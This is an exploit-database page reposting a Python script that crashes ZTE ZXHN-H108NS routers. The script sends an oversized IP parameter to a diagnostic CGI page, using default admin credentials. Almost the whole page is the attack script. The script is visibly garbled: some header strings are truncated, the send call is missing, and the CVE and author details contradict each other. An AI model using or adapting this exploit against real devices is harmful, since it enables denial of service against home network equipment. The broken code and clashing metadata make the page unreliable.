ZTE ZXHN-H108NS Stack Buffer Overflow / Denial Of Service

CVE Category Price Severity
CVE-2018-10603 CWE-119 $1,000 High
Author Risk Exploitation Type Date
Sipke Mellema High Remote 2022-11-21
Our sensors found this exploit at:

Below is a copy:

ZTE ZXHN-H108NS Stack Buffer Overflow / Denial Of Service
# Exploit Title: Router ZTE-H108NS - Stack Buffer Overflow (DoS)
# Date: 19-11-2022
# Exploit Author: George Tsimpidas # Vendor:
# Firmware: H108NSV1.0.7u_ZRD_GR2_A68
# Usage: python <victim-ip> <port>
# CVE: N/A # Tested on: Debian 5.18.5


import sys
import socket
from time import sleep

host = sys.argv[1]  # Recieve IP from user
port = int(sys.argv[2])  # Recieve Port from user

junk = b"1500Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae"
* 5

buffer = b"GET /cgi-bin/tools_test.asp?testFlag=1&Test_PVC=0&pingtest_type=Yes&IP="
+ junk + b"&TestBtn=START HTTP/1.1\r\n"
buffer += b"Host:\r\n"
buffer += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0)
Gecko/20100101 Firefox/91.0\r\n"
buffer += b"Accept:
buffer += b"Accept-Language: en-US,en;q=0.5\r\n"
buffer += b"Accept-Encoding: gzip, deflate\r\n"
buffer += b"Authorization: Basic YWRtaW46YWRtaW4=\r\n"
buffer += b"Connection: Keep-Alive\r\n"
buffer += b"Cookie:
buffer += b"Upgrade-Insecure-Requests: 1\r\n\r\n"

print("[*] Sending evil payload...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print("[+] Crashing boom boom ~ check if target is down ;)")

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.